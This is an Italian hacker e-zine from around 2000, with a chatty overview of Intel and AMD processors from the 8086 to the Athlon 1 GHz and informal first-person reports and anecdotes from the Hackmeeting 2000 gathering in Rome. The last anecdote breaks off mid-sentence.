DiGiTaL BrAinS e K.A.O.S. poi (rigorosamente in ordine sparso) M4L3F1K0,
InDiAn0 , Lord'Xyz , Cyborg , C{h}E, maiden2, (ciao minchio'),Hermea, MainMan,
Inkazzato, Led, Cr4'Zz,cancerman, Lupa-4,Pep , Stean , e tutti gli altri di
#olbia #phreak.it e #aisprod e tutti quelli che x un motivo o per l'altro
non ho citato : Scusate!

Fuck--->ahhhhh ora mi divertooo! Prima di tutto un bel Fuck a "Zio Bill" e a
"Mamma" Telecom (ci vuole!), a tutti quelli che usano i "Nukers-Nabbers"
(Master sei un mito!!) , cristian2 (hai rotto il ca**o! , e poi se volete,
aggiungeteli voi io non odio molta gente!! :-PP.

In sottofondo....
-->Pantera: This Love;
-->Black Sabbath: Paranoid,Iron Man;
-->Metalica: Orion,Master Of Puppets
-->Blind Guardian: Nightfall,Mirror Mirror, Into The Storm

Cibo consumato...un cazzo ho appena finito di pranzare!!(vabbe' una scatola
di togo ci e' passata lo stesso!!)

Ok ora iniziamo davvero però... forse!

Bene bene iniziamo a parlare dei....indovinate un po'?
Microprocessori!!

Facciamo una panoramica abbastanza superficiale se no vi annoierei troppo!!

==[ L'Intel 8086. ]==

E' un microprocessore a 16 bit con tecnologia HMOS introdotto dalla Intel nel
1978, ha avuto una grande diffusione grazie alla Microsoft che ha sviluppato
x esso l' MS-DOS e alla IBM che lo ha adottato nella sua linea di Personal
Computer "XT".

Nella versione base l'ibm usava l'8088 che altro non è che la versione a 8
bit dell' 8086.
Pensate che aveva una frequenza di clock di BEN: 5 MHz(Ohhooho!! direte voi!!)
un set di 70 istruzioni di base combinabili fino ad un massimo di 30 tipi di
indirizzamento,compatibilità con l'interfaccia Multibus, address bus a 20 Bit
(1 M),registri operativi a 8 Bit e compatibilità software verso il basso.

==[ l'80386 ]==

Facciamo un piccolo salto x andare a parlare dell'80386 con il quale l'intel è
entrata nel mercato dei processori a 32 bit con un buon livello di
multitasking,anch'esso è compatibile in software verso il basso, ha il bus
dati e indirizzi separati e a 32 bit cosicchè la memoria fisica indirizzabile
arriva a quota 4 GHz ed è pure pipelined cioè la prima fase del paralellismo
(chi ne sa +di me mi picchierà x questa definizione mah..) ed è quindi in
grado di decodificare le 3 istruzioni successive alla fase di prefetch.

Questo processore puo' lavorare in 3 modalita' diverse:

MODO REALE--->che coincide con quello dell'8086,con memoria indirizzabile
limitata ad 1 Mbyte e segmentata in blocchi di 64 KByte indirizzati da
offset a 16 bit

MODO PROTETTO--->Nato con l'80286 questo modo permette un efficiente
funzionamento multitasking gestendo la protezione di memoria fra task
differenti,impedisce cioe' che un task acceda alla parte di memoria in uso
da un altro task.
Il modo protetto adotta una gestione della memoria di tipo virtuale che
mantiene nella memoria fisica solo le pagine utilizzate mantenendo quelle
in attesa nella mem di massa.
I descrittori relativi ai vari task attribuiscono loro uno fra 4 livelli
di protezione:

livello 0: corrisponde al nucleo del sistema operativo;
livello 1: allo strato esterno sempre del s.o.;
livello 2: alle applicazioni ad alta priorita';
livello 3: alle altre applicazioni.

Le applicazioni posso chiedere i servizi del s.o. solo attraverso opportune
porte di comunicazione (Gate Calls); in nessun altro modo e' possibile
accedere da un livello alle risorse e alla memoria riservate a un livello piu'
interno.

MODO VIRTUALE 8086---> E' in realta' una variante del modo protetto nel
quale l'80386 gestisce piu' task concorrenti che lavorano in modo reale in
pratica un emulazione di piu' 8086,possono comunque coesistere dei task che
lavorano in modo virtuale 8086 e altri che lavorano in modo protetto vero
e proprio come ad esempio accade nell' OS/2 della IBM.
Le istruzioni di questo microprocessore altro non sono che implementazioni
di quelle gia' esistenti nell'8086 come quelle che gestiscono i dati a 32
Bit e quelle di controllo dei vari modi di funzionamento.
Lo spazio di I/O mappato separatamente dalla memoria e sempre di 64 Kbyte
anche se sono possibili trasferimenti con parallelismo a 32 bit.

==[ l'80486 ]==

Il '486 ha un architettura a 32 bit che implementa tutte le funzioni del
predecessore ma che in piu' incorpora nello stesso chip il coprocessore
matematico per i calcoli in virgola mobile e una memoria cache di 8 Kbyte
interna, al contrario dei sistemi '386 dove la memoria cache era esterna CPU
e necessitava di un apposito cache controller.Viene utilizzata come buffer tra
memoria di sistema e microprocessore,e' una memoria statica (SRAM) veloce che
serve a ridurre i tempi di accesso a istruzioni e dati usati di frequente,
infatti quando la CPU deve leggere dalla ram prima controlla il contenuto
della memoria cache, se il dato o l'istruzione e' presente lo prende
direttamente da li' con 0 stati di wait altrimenti lo legge dalla RAM di
sistema mettendoci' pero' cosi' dai 2 a 5 stati di wait, viene anche messo
nella cache cosicche' di facilitarne la lettura alla richiesta successiva.

Del '486 subito dopo la sua uscita e' stata introdotta una versione economica:
il '486SX che anche se privo del coprocessore matematico era sostanzialmente
identico, sono poi seguite numerose altre versioni tra le quali ricordiamo
forse il piu' diffuso il '486DX2 a 66 Mhz con clock interno a 66 Mhz e clock
sul bus di 33 Mhz.

==[ Arriva il Pentium.. ]==

Successivamente al '486 e' stato introdotto sul mercato dalla Intel il
Pentium basato su architettura interna a 32 bit ma con bus dati a 64 bit;
incorpora al suo interno un coprocessore matematico e ben 2 memorie cache da
6 Kbyte, una per i dati e una per le istruzioni.

Utilizza inoltre una tecnica di doppio pipelining conosciuta anche con il
termine di "architettura superscalare" la quale permette l'esecuzione di piu'
istruzioni in un singolo ciclo macchina,e' cioe' una CPU almeno parzialmente
parallela,la prima di questo genere utilizzata nell'informatica personale.

==[ Il Pentium MMX ]==

La tecnologia MMX e' un ulteriore innovazione nell'architettura dei processori
Intel che estende le possibilita' multimediali dei PC, si puo' dire che e' il
miglioramento piu' significativo nell'architettura dei processori Intel dopo
l'uscita del '386.

Include, rispetto al Pentium 57 nuove istruzioni orientate ad operazioni di
elevato parallelismo. La tecnologia MMX e' sostanzialmente un architettura
SIMD (Single Istruction,Multiple Data); questa architettura permette ad una
singola istruzione di operare su piu' dati contemporaneamente,ad esempio con
una sola istruzione MMX possono essere sommate 8 coppie di dati di tipo intero
Queste istruzioni parallele utilizzano registri a 64 bit:a seconda
dell'istruzione, i registri possono essere
visti come contenenti 8byte,4 parole a 16 bit, 1 parole a 32 bit o un dato a
64 bit. Il miglioramento delle prestazioni dovuto ad un alto grado di
parallelismo e' rilevante sopratutto nell'ambito di applicazioni 2D/3D, di
elaborazione immagini e nella compressione dei dati.

==[ Il Pentium Pro ]==

Il Pentium Pro e' anch'esso un evoluzione della famiglia Pentium,sono
disponibili processori a partire da 150 Mhz e possono essere utilizzati fino
a 4 processori insieme in sistemi multiprocessore.

Questo processore permette di ottenere prestazioni superiori ad un Pentium
grazie alla Dynamic Execution (esecuzione dinamica) che altro non e' che una
combinazione delle tecniche qui' sotto:

*******>Multiple Branch prediction:
il processore praticamente guarda molto piu' avanti dell'istruzione che
sta eseguendo e predice quelle che molto piu' probabilmente verranno
eseguite successivamente;

*******>Dataflow Analisys:
il processore analizza quali istruzioni sono dipendenti dai risultati delle
istruzioni in esecuzione creando cosi' una lista ottimizzata di istruzioni
da eseguire;

*******>Speculative Execution:
la lista di istruzioni ottenuta tramite la Dataflow Analisys viene quindi
utilizzata in modo da impegnare al massimo le risorse del processore
ottenendo cosi' un miglioramento complessivo delle prestazioni.

==[ Pentium 2 ]==

Non analizziamo questo processore x motivi di "spazio" [(voglia! ;-P)] vi
basti sapere che altro non e' che un sistema che mette assieme le due
tecnologie sopra descritte cioe' la MMX e Pro.

Saltiamo anche la parte relativa al Pentium 3 e andiamo subito ad analizzare
il nuovo processore della AMD l'Athlon a 1Ghz.

==[ l'Athlon 1 Ghz ]==

A pochi giorni di distanza l'una dall'altra la Intel e l'AMD hanno annunciato
l'uscita dei rispettivi modelli di punta (l'Athlon e il Pentium III) ad 1Ghz;
l'AMD pero' a differenza della Intel lo ha reso subito disponibile sul mercato
mentre l'Intel lo ha solo annunciato.

Vediamo un po' di analizzare questo "sogno" per ognuno di noi che sta leggendo
in questo momento:

L'AMD ha un po' bruciato i tempi,passando dall'Athlon a 850 MHz direttamente
a quello a 1GHz senza passare per quelli intermedi come tutti noi ci
aspettavamo,e cosi' ha fatto l'Intel presentando prima il PentiumIII a 1GHz e
in seguito una specie di versione "economica" a 933 MHz, ma questa uscita
anticipata ha un po' delineato i limiti di questo processore
(parlo dell'Athlon :)) poiche' mentre la famiglia dei PIII integra al suo
interno i due tipi di cache, l'Athlon tiene fuori quella di secondo livello
(L2); spieghiamo meglio questo punto:

il processore per accedere ai dati utilizzati molto frequentemente o
recentemente accinge alla cache;abbiamo due tipi di cache: una di primo
livello chiamata L1 e una di secondo livello detta appunto L2, il processore
cerca il dato richiesto nella cache di primo livello, se non lo trova passa a
quella di secondo livello, se assente pure in questa va a cercarlo nella RAM
frallentando
cosi' il processo in esecuzione,e' chiaro quindi che la L2 trovandosi
esternamente lavora piu' lentamente del processore stesso costringendolo a
rallentare,e' questo un fatto da non sottovalutare se vogliamo valutare
effettivamente le prestazioni di un processore .

L'AMD ha annunciato di voler spingere in breve tempo gli Athlon fino 1,5GHz
per Poi passare ad una altra famiglia di processori: i "Thunderbird" che
avranno A detta della casa americana una tecnologia innovativa per superare
questi inconvenienti tecnici.Per ora il prezzo di questo processore si aggira
sui due milioni e mezzo, prezzo abbastanza proibitivo x un utente medio, anche
perche' non si e' rivelato questo "mostro" che ci possiamo aspettare.

Infatti in applicazioni d'ufficio, grafica e giochi otterremo piu' o meno
lo stesso risultato con uno a 700 MHz, anche xche' in grafica e nei giochi
il fattore predominante nella visualizzazione e' la potenza della scheda video
mentre risulta molto buono nella gestione di grandi archivi o dove si
necessiti di una grande potenza di calcolo e il bisogno di un gran numero di
operazioni matematiche.

EEHHHHHHHHHH abbiamo finito!!!! Un graziiieeeeee a tutti quelli che sono
arrivati qua in fondo...(non so come avete fatto mah..).
Non posso lasciarvi senza aver detto la frase (o stronzata fate voi) del
giorno:

"If one man asks another what a Hacker is
And the other man answers him,
Neither of them knows it."

- Borrowed Zen Proverb

ciao e alla prossima ...

P.S. x commenti insulti e tutto quello che volete la mia e-mail e'
Hambucker@myself.com

---H4mBuck3r---


--------------------------------------------------------------[ HacK-it00 ]---
===] SPECIAL HACK-IT 00 [=====================================================
-----[ OldirOn61 ]------------------------------------------------------------


Anche quest'anno si e' conclusa la kermesse di smanettoni/scoppiati (io mi
trovo nel secondo gruppo! :P) altresi' chiamata "Hackmeeting 00".

Per me e' stata la prima volta (Ebbene si, ero un verginello!), e devo dire
che, esclusa una "fantomatica" rete a 100Mbit che per il 50% era down, e per
il restante si viaggiava ad un max di 3.5K al sec., non e' stato affatto male.
Stupenda l'ambientazione (Nelle cento-celle del CSOA forte prenestino), da
qualche giornale (mi pare la Repubblica) disegnato come uno
"scenario postatomico etc." A dir la verita' l'ambientazione era + medioevale
che postatomica: Celle grezze, a mattoni, zanzare grosse come Apache degne di
US Army, non c'erano finestre, ma feritoie... e per concludere un umidita' che
raggiungeva livelli preoccupanti per le schiene dei poveri hackari, costretti
dalla loro passione a passare 3 giorni li' dentro.....

Per 3 giorni non si e' dormito...anche se arrivati ad una certa ora (5/6 am)
si eseguiva il ben noto comando "halt" e si cercava di pisolare li', nello
stesso posto in cui c'era il PC....

A dir la verita' si era organizzato un Dormitorio... Ma la maggiorparte ha
preferito non mollare mai la propria macchina.

Fondamentalmente, almeno per quanto mi riguarda, e' stata un'esperienza + che
positiva, anche se ci sono state certe cose che non ho gradito molto....

-La rete andava e non andava... lo sport nazionale era quello di girare per le
altre postazioni a chiedere: "Voi uscite?"....
Risposta: -No No, noi restiamo qua!- (vero mEtBoyZ ? ;-))

-Sniffer piantati ovunque... si dice addirittura impiantati nel gateway, altro
elemento sempre presente negli hack-it....

-Per quanto riguarda i corsi... ho gradito molto quelli sul Packet Radio, e
quello trasmesso via ip-radio su come mettere su un hacklab... bello il
seminario sul reversing, quello sul Social Engineering, e quello sul Flash,
che nonostante non abbia molto a che fare con l'hacking vero e proprio, ha
riscosso molto, anzi moltissimo successo.
I corsi sul TCP/IP e quello sulla crittografia sono stati invece i meno
gettonati (capiamoci, non erano orrendi, ma forse erano troppo generali e
semplici, non destinati ad un pubblico di un hack-it) anche se hanno
sicuramente contribuito a dare delle forti basi a chi di TCP/IP e
crittografia sapevano poco e niente....
Purtroppo, non sono riuscito a seguire il seminario notturno sull'hacking
delle reti x.25, visto e considerato che gia' 5 minuti prima del corso, la
cattredale era piena zeppa, ed era quindi impossibile sia guardare, che
ascoltare il "docente" di turno....
Non in programma, ma cmq molto interessante, e' stata la lezione "dal vivo"
della UIC, condotta dal caro amico Quequero, con tutta (o quasi) la UIC al
seguito, dall'alto della postazione No.7....

-Sono entrate le telecamere del Tg1....e sinceramente questa mossa non e'
stata molto gradita....la gente che girava per le postazioni con una
telecamera spenta appesa sul petto, ma in realta' ne aveva un altra accessa
nascosta dalla mano, che riprendeva praticamente tutto! VERGOGNA!!!!!!
Nemmeno il coraggio delle proprie azioni.... girano voci che addirittura
siano entrati degli sbirri....ma questo e' un altro discorso.

Purtroppo l'hack-it e' stato segnato in negativo da alcuni furtarelli.... si
dice che siano spariti un banco di ram, un cellulare, e non meno importante
il MIO Cyloom...Approfitto di questo spazio per lanciare l'ultimo, disperato
appello:

CHIUNQUE ABBIA PRESO IL MIO CARO CILOTTO ME LO FACCIA SAPERE, ANCHE IN FORMA
ANONIMA, A OLDIRON61@INAME.COM NON LO RIVOGLIO INDIETRO, VOGLIO SOLO SAPERE
CHE E' VIVO E FUNZIONANTE! ;-) ...E SOPRATTUTTO, CHI LO HA PRESO, RENDA ONORE
AL PADRONE ORIGINARIO, CHE HA PASSATTO DEGLI OTTIMI MOMENTI CON QUEL CILOTTO!!

C'e' altro da dire? Beh si, oltre al lato puramente "tecnico" c'e' quello
umano...ho conosciuto tanti amici, si sono consolidate vecchie amicizie, c'e'
stato un giro di canne al di fuori della norma (vero Gufo?) insomma, la mia
"esperienza" dell'hack-it, oltre ai corsi ed ai vari cazzeggi sul PC e' stata
segnata dall'aver conosciuto gente, che fino a quel momento era solo un "nick"
Ora, sicuramente, questa "gente" e' diventata un bel ricordo nella mia malsana
e scoppiata mente....

Prima di concludere un po' di saluti e ringraziamenti....

Il primo saluto va a Lord Guf... un grazie per tutte le bombe che mi hai
offerto....prometto che l'anno prossimo verro' piu' fornito! ;-)

Il secondo va a tutti quelli che hanno deliziosamente riempito il mio cilotto
(fino a quando ce l'avevo io...), piazzato sopra la mia(?) tower vicino ad un
cartello: "Aiutateci a Riempirlo!" Grazie per aver dilettato dei poveri
ragazzi "bisognosi"!!!!! ;-)

E poi, in ordine rigorosamente sparso:

Nobody88, Poplix, Rubik, The Duke, Mayhem (che ha descritto la parte sconvolta
di Oldiron61 in diretta a Radio Jodler...), Michell9, QueQuero, TinMan, sP3nky
SpinONE, KriosMan, Baron Sam, Vecna, Smilzo, Dante Alighieri, ]Alt 255[, Smav,
Maniac666, Graffio, Prodigy, Dibellas, Pinna, Dark0, /sPIRIT/, TheSaint, i
Romani del loculo nø6, il CSOA Forte Prenestino, tutti quelli che mandano
avanti la baracca, e tutti quelli che sicuramente ho dimenticato!!!

E l'anno prossimo???
A Catania belli miei!!! Per la felicita' di ]CyBOrG[ e di tutti i siculi...
e per la tristezza di tutti i "Nordici" che gia' per venire a Roma hanno
storto un pochino il muso....

Byeeeeeeeeeeeeeeeeee!

---OldirOn61---

--------------------------------------------------------------[ HacK-it00 ]---
===] HACK-IT 00 RESUME [======================================================
-----[ Quequero ]-------------------------------------------------------------


[NOTA DI OLDIRON61: Non fidatevi molto quello che dice il Que, io stavo
assieme a lui, e vi ASSICURO che non tutto quello che leggerete e'
attendibile al 100%, e sopratutto la cronologia ed il tempo del racconto e'
LEGGERISSIMAMENTE sfalsato! ;-))... e poi sono io che perdo i colpi!]



Salve a tutti, belli e brutti :),
finalmente ho a disposizione un po' di tempo per stilare quello che sarà il
riassunto dell'HackMeeting 2000 sotto il mio punto di vista :).

[Giovedì 15 Giugno 2000]

Io (Quequero), Oldiron61, Kalkutta ed Eugenio ci carichiamo come muli di
componenti informatici e prendiamo il bus dell 19:00 L'Aquila-Roma, dopo poco
meno di due ore arriviamo a Tiburtina, ci infiliamo in una pizzeria ed il
buon Que mangia qualcosa come 6 pizze di seguito....

Usciti da lì prendiamo la metro, il tram e dopo 2 ore (erano circa le 22:40)
il tramviere ci dice di scendere che siamo arrivati....Il buio è totale, il
silenzio pure, ma la felicità è tanta....Imbraccio il mio monitor e salgo
delle scalette....Poche centinaia di metri dopo :P arriviamo all'entrata del
forte, la prima scena che ci si presenta davanti erano due uomini che erano
indecisi se rubare un SR50 oppure prendere l'NRG...
Vabbè, la seconda scena è stata il buoio, la terza è stata l'entrata al forte.

Varcato il portale dimensionale.....Ermmmm, il portale di ingresso....Un tizio
molto rasta (figoooooooo :) con strani eufemismi ci indica il posto dove
saranno messi i pc...Bene, entriamo a soltanto i primi due loculi erano pieni,
nel secondo c'erano una quantità industriale di computer utilizzati da due
sole persone con tanto di striscia luminosa, lucine rosse e sintetizzatore....

Maledetto sintetizzatore. Ci allochiamo al terzo loculo....
Vediamo perà che non c'era il cavo telefonico sicchè passiamo al quarto :)...

Bien, montiamo tutto e felici come dei martinetti idraulici dopo le 23
accendiamo il computer....Sorpresa...Il Linux non parte, ma porkkkkkkkk,
decidiamo di farci prestare una distribuzione da quei tipi con le lucine rosse
(che saranno poi soprannominati da me: i Robot, visto il quantitativo di ore
che erano riusciti a rimanere senza dormire...ovvero tutti e 4 i giorni) che
ci danno una Mandrake 7.1 :((..

Vabbuò, parte la prima installazione, aspettiamo 51 minuti e poi si blocca,
bene, parte la seconda, aspettiamo (e non scherzo) 2 ore e 51 minuti e tutto
va a buon fine, unico problema era la lentezza esasperante del sistema con
una overbloated distribution :( vabbuò, un tizio ci installa la scheda di
rete, dopo ci viene assegnato un ip (192.168.100.122), un DNS (192.168.100.2)
ed un GateWay (192.168.100.1), due ore dopo il nostro ip diventa
192.168.101.122, felici come le pasque di una linea satellitare iniziamo a
scaricare.....

Ottimo, si viaggiava a 20kb/sec miiiii che bello...Tre minuti dopo però la
velocità si era stabilizzata a 2kb/sec con picchi di 0.6kb/sec, vabbuò, la
rete ci aveva deluso, ma almeno avevamo da dove nagiare, o meglio, pensavamo
che fosse così...Beh, non esattamente visto che la rete collassava massimo
ogni 12minuti. Perfect, cazzeggiamo un po', io vado a fare un giro ed un
tizio mi offre una canna (Grazie) poi usciamo, andiamo i bagno, ci andiamo a
comperare ben 6litri d'acqua (1.5 a testa) e torniamo alla postazione.....

Navigando navigando il tempo va, passano le ore e si fanno le 4:20 del mattino
decidiamo di andare a dormire, cerchiamo il dormitorio (che nel frattempo NON
era stato neanche aperto) e ci indicano un luogo pieno di tunisini e
marocchini....Non che sia razzista per carità, però la paura di rialzarci
senza neanche le mutande ci aveva spinti a dormire nel loculo....In fondo non
sarebbe stato tanto male se non ci fossero state zanzare grosse come muli
delle ande, ed i robot che sparavano 24 ore su 24 musica techno, ma ci siamo
abituati, la prima notte avrò dormito meno di 30 minuti su quelle maledette
sedie, sicchè nel frattempo avevamo deciso di scaricarci due pornazzi da
qualche sito...

Noi che abbiamo il palato raffinato abbiamo propeso per i manga giapponesi....
Neanche ce li siamo scaricati, ma almeno li abbiamo visti :). Arriva
finalmente la tanto agognata alba, cerco qualcosa per lavarmi che NON trovo...

Alchè mi butto in una fontanella cercando di recuperare almeno parte del mio
igiene :)...Vagando vagando vedo davanti ai tunisini delle allegre piantine...
Hehehehehehehehe, ne prendo un paio di foglie da una che reputavo fosse
femmina e le porto dentro, le essicchiamo e le fumiamo...Vabbuò, meglio di
niente :),

piccola digressione: il piè (aka oldiron61) aveva detto che quelle
piante erano tutte maschio e pure la mia era maschio.....Tsè, non si fosse
mai permesso, sono andato dal tunisino e gli ho chiesto quali fossero femmine,
lui mi ha detto: "tutti maschi tranne quella che sicuramente femmina al 100%",
ovviamente io avevo preso la pianta giusta (oh povero piè che perde i colpi :)
fine digressione.

Siamo faticosamente arrivati al 16/06/2000 ovvero l'inizio ufficiale
dell'hackmeeting 2000, ed infatti la gente arrivava e le belle pulzelle pure
:), intato arriva vecna e degli altri tizi di fianco a noi con la solita
musica techno, quindi conosciamo un certo Pinna, un tanto strano quanto
simpatico, inutile descriverlo perchè NON ce la farei MAI! Cotal tipo regala
al piè un ciddì di musica techno (e kazz basta con la techno) okkei, tra una
navigata e l'altra arriva un tizio, aveva una faccia davvero troppo simpatica
ed ogni volta che passava ci salutava...Ed io dicevo al piè: "ma questo ki è
e che cavolo vuole che saluta?"
...Vabbuò, passa una, due, tre, quattro volte
fino a che il piè lo ferma e gli dice ma tu chi sei? E lui:"io sono N0body88!"
...Il piè mi chiama e mi fa: "ti presento sto tipo...Nobody".....Ollèèèè il
nostro saluta sfocia in un abbraccio che durerà parecchi minuti, la mia
felicità
era altissima, nobody è stato (ed è ancora) uno dei miei amici di rete più
cari.....Se vi interessa, lui ci salutava perchè in un certo modo si sentiva
dentro di conoscerci, ma era così buffo che ci aveva fatto ridere tantissimo
:))). Bene, decidiamo di indossare le magliette da battaglia, esco per andare
alle piantine a prendere altre foglie e sento: "C'è UN Quequero da queste
parti?"
...

Io mi giro e dico: "Potrebbe, ma tu chi sei?"..."Letale Malattia" heheheheheh,
siiiiii io ed il malatuzzo ci presentiamo ed ancora la mia felicità è al
culmine, il malatuzzo che mi aveva aiutato tante e tante volte (anche se un
po' leim :) bene chiacchiero con lui e poi vado al bagno ed alle piantine.....

Successivamente passo all'altra ala del forte dove un tizio mi ferma dicendomi
di essere iscritto alla mia ML (perdonami ma non ricordo il tuo nick :(( ) lo
saluto e conosco anche LordGufo (che ci offre un po' di fumo :) e tanti altri
tizi.....Hihih, poi arriva la UIC, eggià, metà UIC stava la, e finalmente
riesco a conoscere il maledetto Baron-Sam :), la sua moglie: Signora Iena,
Spin0ne (che tizio :))) Kriosman, Dibbellas, Pispola, olè dopo lunghe
peripezie qualcuno mi avverte: "Tra poco arriva Xoa e ti vuole vedere nudo
legato al suo cospetto"
...

Ahhh iniziamo bene....Poco dopo infatti davanti alla mia postazione passa Xoa
con Spezio, li fermo e mi sbacucchio un po' Xoa che si dimenava per fuggire :)
...Scopro poi che Spezio aveva una concezione della bellezza femminile pari
alla mia...Un motivo in più per andare d'accordo :)....Bene, chiacchieramo
con Xoa, la UIC, Spezio, LittleJo, Malattia ecc.....

Poco prima ero stato al seminario sulla crittografia tenuto da un certo
Cerin0.....Se non ci siete stati avete fatto bene.......Okkei, arrivo in fondo
all'ala e conosco Mayhem.....Mitico mayhemuzzo, non so se in terra esista
qualcuno più simpatico di lui....Bene, subito dopo mi viene presentato il
Duka che mi accoglie a piccoli schiaffi (alla faccia della nobiltà è duca?:)))
okkei, andiamo fuori ed il Duka ci offre a tutti una birra (beh, i duka so
ricchi e questo è noto :) quindi Mayhem si avvicina a me e mi passa il suo
cell che suonava......

Io dico: "Ma chi è?" e lui: "Tu parla".....Vabbuò, risponde una graziosa voce
femminile, alquanto inquietata dalle mia parole.....Diciamo che l'ho fatta un
po' inkazzare perchè le avevo detto che il suo alessio :) stava al tavolo con
un altra, ma insomma :))))))......
Abbiamo chiacchierato un po' e poi siamo tornati alla postazione...Quindi
arriva un certo Prodigy, un tizietto tutto muscoloso che ci faceva da cane da
guardia al pc :) quando noi non c'eravamo, alla domanda: "ma dove dormi?",
lui mi ha risposto: "io non dormo".....Beh, non diceva bugie è stato tre 3
giorni senza dormire, complimenti :)...Ha chattato per circa 9 ore consecutive
sul nostro pc, ma tuttosommato è stato un bravo ragazzo :) dopo ho conosciuto
colui che assieme a me manda avanti la UIC, ovvero Tin_Man, non so se Tin a
tempo libero faccia il sollevatore di autocarri, fatto sta che è una massa
compatta di muscoli, mitico tin :)))))))))

Poi nei giorni seguenti abbiamo approfondito le nostre conoscenze con
Baron-Sam,
ed abbiamo scoperto che la moglie fa bene a tenerlo a bacchetta :))) e con
Spin0ne, non parlo perchè è padre di famiglia, quindi deve portare avanti una
certa immagine :P ma cmq non ho mai visto una persona simile, lui più di tutti
mi ha dato l'impressione migliore, non saprei davvero come descriverlo cmq i
suoi figli sono fortunati ad averlo come padre :))).

Anche il barone è stato un tipo davvero intrigante hahahahahah non potrei
descriverlo perchè è fatto tutto a modo suo e cmq è miticuzzo pure lui :)
(ciauz Christian).

Siamo poi andati al seminario sul reversing tenuto da +Malattia e LittleJo...
Arrivato alla parte riguardante il reversing su linux ho dovuto accompagnare
xoa a bere che sennò si essiccava come un fico dentro alla sala da thè, poi
abbiamo fatto un po' di casino e le signorine del forte si sono un po'
inkazzate e ci hanno intimatio di andre via.....Che brutta figura :)

Il seminario è continuato fuori e xoanon ha dato stavolta un contributo
positivo anzichè negativo :)

Ah, ovviamente ho anche conosciuto Alt255 che è scomparso in modo inspiegabile
:), bellissimo l'incontro con lui, io stavo parlando con mayhem e lui si
avvicina a noi e dice: "avete visto Quequero?"...Mayehm lo guarda senza dirgli
che ero io :), io lo guardo e gli dico chiedo chi è....Poi gli diciamo di
cercarlo per il forte visto che sta in giro, solamente che la sua faccia
sconfortata e addolorata mi ha portato a svelarmi, se avesse avuto una faccia
più felice forse non gliel'avrei detto di essere io :)))

Degna di nota la storia del: "ma si esce?", quando qualcuno si rivolgeva a te
in quel modo voleva sapere se si riusciva ad andare online, bene, immaginate
le nostre risposte: "no no che oggi fa freddo", "si si usciamo, ma quando fa
giorno"
, "no ma che scherzi! Ora fuori è pieno di zanzare", "No ora non mi va,
forse dopo"
ecc.....

Il tutto era reso ilarico dal fatto che noi eravamo spontanei nel rispondere
tali cose finchè ad un certo momento ci siamo posti il quesito: "ma perchè
sti tizi vogliono sapere se usciamo? Che gli frega?"
......hihihihi

Ho conosciuto anche il santo (che ha rischiato di prendere le botte perchè
continuava a chiamarmi QueroQuero) ed il suo amico del quale non ricordo il
nome (chiedo venia)....Quindi abbiamo passato gli ultimi momenti insieme, ed
ho anche tenuto una mini lezione home-made di hacking.....hihihihi :), per
non dire poi le risate che ci siamo fatto con una persona che chiameremo
Pierk****, un nome fittizio ovviamente :P

Quindi è arrivato Genius e Ja Lai (finalmente ho conosciuto anche loro :),
quindi ci siamo fatti le ultime foto e siamo andati via, molto bello il mio
bacio con xoa hahahahahahahahahhaha beh, tutto qui se non erro, ovviamente
non sto a raccontarvi della belga che ho conosciuto e che era veramente bona,
neanche sto a raccontarvi di come s'è inkazzato il tunisino alla 5° foglia di
maria presa dalle sue piante :) perchè questa è un'altra storia.

Di fianco a noi c'erano dei tizi con la techno altissima (volume 10), tanto
per farvi capire la furbizia di tale gente leggetevi 'ste due righe:

Que: "Scusate potete abbassare un po' che noi stiamo per addormentarci?
Grazie!"

Tizio: "Si si certo".....Volume 1 (la musica era come un sibilo)
Que: "Ho detto abbassare un po', mica spegnere tutto :)!"
Tizio: "Ah si grazie".....Volume 12

D'oh!

---Quequero---

--------------------------------------------------------------[ HacK-it00 ]---
===] KALKUTTA'S STORY [=======================================================
-----[ Quequero ]-------------------------------------------------------------

  


Beh, un po' di spazio a kalkutta glielo dobbiamo dedicare altrimenti non vale!

Kalkutta è un personaggio un po' mistico, 1.80m per 80kili di peso, niente di
speciale, al primo momento che il piè l'aveva visto ci aveva detto: "lasciamo
20.000£ a testa a kalkutta per il ritorno visto che mi pare il più
responsabile"
, questo era dovuto al fatto che kalkutta in quel momento non
parlava visto che io ed eugenio avevamo pensato bene di impaurirlo un pochetto
per farlo stare calmo (come si fa con i bambini insomma :)....Dopo 12minuti
piè aveva fatto marcia indietro riguardo a: "è il più responsabile di noi",

Kalkutta in realtà è profondamente buono se non che ha il vizio di vendicarsi
per qualunque cosa 100volte più pesantemente dello scherzo che gli fai....In
quei giorni aveva dormito con me per terra assieme agli scorpioni e alle
scolopendre, ed ogni tanto nel sonno si alzava dicendo cose tipo: "perchè a
lui l'abbracci e a me no"
...Oppure: "Eugè, Eugè, Eugè, xyzzxyxzyyxyzyxyzyxyyz"
......La cosa più bella però è stata quando il master Kalkutta si è alzato ed
ha iniziato a dire: "Ragà, prima è arrivato morfeus e se n'è cascato per terra
poi si è rialzato tutti inkazzato xyxyxzyxzyzyxyzy"
e poi ripiombava giu a
dormire, molto bello anche quando inziava delle discussioni completamente
fantastiche con noi, su fatti avvenuti solo nella sua mente.........

Hihihi, non vi dico le risate che ci siamo fatti. C'è da dire che calcutta
era di religione protestante e non fumava e per telefono mi aveva chiesto:
"ma succede qualcosa se non fumo? La mia religione mi impone di non farlo ecc.
"
....Parole SUE, nessuno lo aveva costretto a fumare, finchè una sera lui
entra nel giro e inizia a farsi un tiro......due, tre, quattro, cinque.......

....Per staccarlo abbiamo dovuto picchiarlo, non solo, chi per disgrazia
capitava nel giro prima di lui era finito, io ho avuto questa sfortuna......

Faccio un tiro...due (con molta calma che stavo navigando e non c'era fretta)
al terzo tiro si inkazza come un picchio irlandese e inizia ad attaccarsi a
me stile fantozzi per portarsi via la canna.........La prende ed in 1/3 di
secondo si fa qualcosa come 10-12 tiri e non la voleva passare, era diventata
sua (conversione Protesante->Rasta) per non dire poi come si era attaccato al
cilotto (aka silo) di piè, non potevi toglierglielo dalle mani che ti si
avventava contro come un cane rabbioso, porka miseria, sembrava che c'aveva
la colla alle mani, l'unico problema era che con un tiro lui stava già finito
e quando kalkutta sta finito mena, e 80kg di persona che menano e ridono a
crepapelle sono pericolosi, era per questo che cercavamo di tenerlo lontanto
dal fumo, solo che più lo tenevamo lontato più lui studiava tutti gli
escamotage per poter fumare, ora di nascosto, ora prima degli altri, ora da
solo ecc.....Un drogato con la "D" maiuscola!

Finito qui? NOOOOOOOOO! Kalkutta è anche diventato gay, mi spiego, kalkutta
non ha mai avuto una ragazza, anzi, ha pure subito il trauma di vedersi
portar via da un tizio la donna che più amava, così non ha mai baciato una
